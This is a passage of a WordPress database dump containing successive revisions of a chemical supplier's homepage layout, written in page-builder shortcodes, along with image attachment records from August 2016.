agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="599"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image title="FluoroExtreme" id="604" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:34:55', '2016-08-19 15:34:55', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (607, 1, '2016-08-19 15:39:50', '2016-08-19 15:39:50', '', 'fluoro_bw', '', 'inherit', 'open', 'closed', '', 'fluoro_bw', '', '', '2016-08-19 15:39:50', '2016-08-19 15:39:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/fluoro_bw.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (608, 1, '2016-08-19 15:40:47', '2016-08-19 15:40:47', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="599"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:40:47', '2016-08-19 15:40:47', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (609, 1, '2016-08-19 15:42:34', '2016-08-19 15:42:34', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="599"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:42:34', '2016-08-19 15:42:34', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (610, 1, '2016-08-19 15:45:18', '2016-08-19 15:45:18', '', 'Opteon_H_specialty_fluids_SU', '', 'inherit', 'open', 'closed', '', 'opteon_h_specialty_fluids_su', '', '', '2016-08-19 15:45:18', '2016-08-19 15:45:18', '', 64, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Opteon_H_specialty_fluids_SU.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (611, 1, '2016-08-19 15:45:27', '2016-08-19 15:45:27', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:45:27', '2016-08-19 15:45:27', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (612, 1, '2016-08-19 15:47:18', '2016-08-19 15:47:18', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:47:18', '2016-08-19 15:47:18', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (613, 3, '2016-08-19 15:48:26', '2016-08-19 15:48:26', '', 'Urethane Conformal', '', 'inherit', 'open', 'closed', '', 'urethane-conformal', '', '', '2016-08-19 15:48:26', '2016-08-19 15:48:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Urethane-Conformal.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (614, 3, '2016-08-19 16:00:30', '2016-08-19 16:00:30', '', 'Urethane Missle', '', 'inherit', 'open', 'closed', '', 'urethane-missle', '', '', '2016-08-19 16:00:30', '2016-08-19 16:00:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Urethane-Missle.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (615, 1, '2016-08-19 16:02:54', '2016-08-19 16:02:54', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col 